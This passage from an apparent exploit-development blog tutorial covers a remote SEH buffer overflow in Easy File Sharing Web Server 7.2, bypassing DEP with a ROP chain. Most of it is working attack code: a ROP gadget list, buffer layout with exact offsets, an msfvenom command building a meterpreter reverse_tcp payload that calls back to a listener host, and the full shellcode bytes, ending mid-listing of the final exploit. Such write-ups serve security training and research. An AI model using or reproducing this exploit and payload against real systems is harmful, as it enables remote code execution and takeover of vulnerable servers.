</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x1001b4f6</span><span class="p">,</span>  <span class="c"># POP ECX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c73281</span><span class="p">,</span>  <span class="c"># &amp;Writable location [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x100194b3</span><span class="p">,</span>  <span class="c"># POP EDI # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x1001a858</span><span class="p">,</span>  <span class="c"># RETN (ROP NOP) [ImageLoad.dll]</span>
</span><span class='line'>      <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x90909090</span><span class="p">,</span>  <span class="c"># nop</span>
</span><span class='line'>      <span class="mh">0x100240c2</span><span class="p">,</span>  <span class="c"># PUSHAD # RETN [ImageLoad.dll] </span>
</span><span class='line'>    <span class="p">]</span>
</span><span class='line'>    <span class="k">return</span> <span class="s">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&#39;&lt;I&#39;</span><span class="p">,</span> <span class="n">_</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">rop_gadgets</span><span class="p">)</span>
</span></code></pre></td></tr></table></div></figure>


<p>Those <code>INC EDX</code> are really ugly and annoying, but, quickly looking around for a better solution available, I actually didn&rsquo;t find anything nicer. Luckily we have a massive buffer in our disposal, so we can be a bit sloppy&hellip;</p>

<p>We are almost there! To quickly test wether we are actually disabling DEP or not, let&rsquo;s modify our buffer a bit:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c"># Offsets</span>
</span><span class='line'><span class="n">rop_offset</span> <span class="o">=</span> <span class="mi">2455</span>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">5000</span>
</span><span class='line'><span class="n">seh_offset</span> <span class="o">=</span> <span class="mi">4059</span>
</span><span class='line'><span class="n">eax_offset</span> <span class="o">=</span> <span class="mi">4183</span>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">rop_offset</span>                       <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">create_rop_chain</span><span class="p">()</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xCC\xCC\xCC\xCC</span><span class="s">&quot;</span>                   <span class="c"># couple INT3 instructions, which will act as a breakpoint (only if DEP is disabled)</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">seh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                              <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x1002280a</span><span class="p">)</span>          <span class="c"># overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0xffffffff</span><span class="p">)</span>          <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>        <span class="c"># padding</span>
</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s put it all together and launch our exploit. If we were successful in disabling DEP, the program should automatically break on the INT3 instructions we added right after the ROP chain.</p>

<p><a href="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/success_rop.png"><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/success_rop.png" alt="success_rop PNG" /></a></p>

<p><strong>VICTORY! :)</strong></p>

<h2>Shellcode</h2>

<p>We have successfully bypassed DEP and made stack executable again! Now we can simply put a shellcode of our choice and get that shell!</p>

<p>Doing a bit of maths, we can easily calculate that the maximum size of the shellcode can be 1260 bytes, which is <em>A LOT</em> for a shellcode - and more than enough to fit meterpreter! Let&rsquo;s go ahead and generate a payload we&rsquo;ll use:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.246.171 LPORT=31337 -f python -b '\x00\x3b' | sed 's/buf/shellcode/g'</span></code></pre></td></tr></table></div></figure>


<p>And paste it in right after the ROP chain. Note that the last instruction in our ROP chain is <code>PUSHAD; RETN</code>, so the next instruction to be executed will be simply the next instruction after this one - that&rsquo;s why we&rsquo;re putting our shellcode immediatelly after.</p>

<p>Also, there&rsquo;s a small &lsquo;trick&rsquo; to keep in mind. Because of the way meterpreter decoders work, during the decoding process meterpreter needs to find its own address in memory. It is achieved by using <code>FSTENV</code> instruction, which stores floating point environment on the stack. Because ESP points somewhere in our shellcode, <code>FSTENV</code> writes some additional data onto the stack, what corrupts our shellcode!</p>

<p>One simple way around it is to simply move ESP all the way &ldquo;up&rdquo; (towards lower memory addresses), far away from our shellcode so it doesn&rsquo;t get corrupted. How far to move? Generally size of the shellcode would do. I chose 1500, just to be on the safe side.</p>

<p>Generate relevant opcode (remember about the bad chars that we should avoid!):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali2:~# /usr/share/metasploit-framework/tools/exploit/metasm_shell.rb
</span><span class='line'>type "exit" or "quit" to quit
</span><span class='line'>use ";" or "\n" for newline
</span><span class='line'>type "file &lt;file&gt;" to parse a GAS assembler source file
</span><span class='line'>
</span><span class='line'>metasm &gt; add esp,-1500
</span><span class='line'>"\x81\xc4\x24\xfa\xff\xff"</span></code></pre></td></tr></table></div></figure>


<p>And add it as a first instruction in the shellcode. The buffer should look something like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c"># Offsets</span>
</span><span class='line'><span class="n">rop_offset</span> <span class="o">=</span> <span class="mi">2455</span>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">5000</span>
</span><span class='line'><span class="n">seh_offset</span> <span class="o">=</span> <span class="mi">4059</span>
</span><span class='line'><span class="n">eax_offset</span> <span class="o">=</span> <span class="mi">4183</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="c"># move ESP out of the way so the shellcode doesn&#39;t corrupt itself during execution</span>
</span><span class='line'><span class="c"># metasm &gt; add esp,-1500</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">=</span>  <span class="s">&quot;</span><span class="se">\x81\xc4\x24\xfa\xff\xff</span><span class="s">&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="c"># msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.246.171 LPORT=31337 -f python -b &#39;\x00\x3b&#39;</span>
</span><span class='line'><span class="c">#Payload size: 360 bytes</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xb8\x78\xdc\xf7\x67\xda\xc6\xd9\x74\x24\xf4\x5d\x29</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xc9\xb1\x54\x31\x45\x13\x83\xc5\x04\x03\x45\x77\x3e</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x02\x9b\x6f\x3c\xed\x64\x6f\x21\x67\x81\x5e\x61\x13</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xc1\xf0\x51\x57\x87\xfc\x1a\x35\x3c\x77\x6e\x92\x33</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x30\xc5\xc4\x7a\xc1\x76\x34\x1c\x41\x85\x69\xfe\x78</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x46\x7c\xff\xbd\xbb\x8d\xad\x16\xb7\x20\x42\x13\x8d</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xf8\xe9\x6f\x03\x79\x0d\x27\x22\xa8\x80\x3c\x7d\x6a</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x22\x91\xf5\x23\x3c\xf6\x30\xfd\xb7\xcc\xcf\xfc\x11</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x1d\x2f\x52\x5c\x92\xc2\xaa\x98\x14\x3d\xd9\xd0\x67</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xc0\xda\x26\x1a\x1e\x6e\xbd\xbc\xd5\xc8\x19\x3d\x39</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x8e\xea\x31\xf6\xc4\xb5\x55\x09\x08\xce\x61\x82\xaf</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x01\xe0\xd0\x8b\x85\xa9\x83\xb2\x9c\x17\x65\xca\xff</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xf8\xda\x6e\x8b\x14\x0e\x03\xd6\x70\xe3\x2e\xe9\x80</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x6b\x38\x9a\xb2\x34\x92\x34\xfe\xbd\x3c\xc2\x01\x94</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xf9\x5c\xfc\x17\xfa\x75\x3a\x43\xaa\xed\xeb\xec\x21</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xee\x14\x39\xdf\xeb\x82\x6e\x30\x02\xf9\x07\x33\xea</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x87\xbe\xba\x0c\x27\x11\xed\x80\x87\xc1\x4d\x71\x6f</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x08\x42\xae\x8f\x33\x88\xc7\x25\xdc\x65\xbf\xd1\x45</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2c\x4b\x40\x89\xfa\x31\x42\x01\x0f\xc5\x0c\xe2\x7a</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xd5\x78\x93\x84\x25\x78\x3e\x85\x4f\x7c\xe8\xd2\xe7</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x7e\xcd\x15\xa8\x81\x38\x26\xaf\x7d\xbd\x1f\xdb\x4b</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2b\x20\xb3\xb3\xbb\xa0\x43\xe5\xd1\xa0\x2b\x51\x82</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xf2\x4e\x9e\x1f\x67\xc3\x0a\xa0\xde\xb7\x9d\xc8\xdc</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xee\xe9\x56\x1e\xc5\x6a\x90\xe0\x9b\x4e\x39\x89\x63</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xce\xb9\x49\x0e\xce\xe9\x21\xc5\xe1\x06\x82\x26\x28</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x4f\x8a\xad\xbc\x3d\x2b\xb1\x95\xe0\xf5\xb2\x19\x39</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xe3\x3c\xde\xbe\x0c\xbf\xe3\x68\x35\xb5\x24\xa9\x02</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xc6\x1f\x8c\x23\x4d\x5f\x82\x34\x44</span><span class="s">&quot;</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">rop_offset</span>                       <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">create_rop_chain</span><span class="p">()</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">shellcode</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">seh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                                <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x1002280a</span><span class="p">)</span>         <span class="c"># overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0xffffffff</span><span class="p">)</span>         <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>        <span class="c"># padding</span>
</span></code></pre></td></tr></table></div></figure>


<p>If everything went fine, we should get the meterpreter shell. Set the listener up and run the exploit.</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/meterpreter.png" alt="meterpreter PNG" /></p>

<p>Whoop-whoop! Obligatory victory-dance (cc: <a href="https://twitter.com/TheColonial">OJ</a>) :)</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/shell_dance.gif" alt="shell_dance GIF" /></p>

<h2>Summary</h2>

<p>The final exploit with a simple PoC shellcode spawning a calculator is shown below.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
<span class='line-number'>92</span>
<span class='line-number'>93</span>
<span class='line-number'>94</span>
<span class='line-number'>95</span>
<span class='line-number'>96</span>
<span class='line-number'>97</span>
<span class='line-number'>98</span>
<span class='line-number'>99</span>
<span class='line-number'>100</span>
<span class='line-number'>101</span>
<span class='line-number'>102</span>
<span class='line-number'>103</span>
<span class='line-number'>104</span>
<span class='line-number'>105</span>
<span class='line-number'>106</span>
<span class='line-number'>107</span>
<span class='line-number'>108</span>
<span class='line-number'>109</span>
<span class='line-number'>110</span>
<span class='line-number'>111</span>
<span class='line-number'>112</span>
<span class='line-number'>113</span>
<span class='line-number'>114</span>
<span class='line-number'>115</span>
<span class='line-number'>116</span>
<span class='line-number'>117</span>
<span class='line-number'>118</span>
<span class='line-number'>119</span>
<span class='line-number'>120</span>
<span class='line-number'>121</span>
<span class='line-number'>122</span>
<span class='line-number'>123</span>
<span class='line-number'>124</span>
<span class='line-number'>125</span>
<span class='line-number'>126</span>
<span class='line-number'>127</span>
<span class='line-number'>128</span>
<span class='line-number'>129</span>
<span class='line-number'>130</span>
<span class='line-number'>131</span>
<span class='line-number'>132</span>
<span class='line-number'>133</span>
<span class='line-number'>134</span>
<span class='line-number'>135</span>
<span class='line-number'>136</span>
<span class='line-number'>137</span>
<span class='line-number'>138</span>
<span class='line-number'>139</span>
<span class='line-number'>140</span>
<span class='line-number'>141</span>
<span class='line-number'>142</span>
<span class='line-number'>143</span>
<span class='line-number'>144</span>
<span class='line-number'>145</span>
<span class='line-number'>146</span>
<span class='line-number'>147</span>
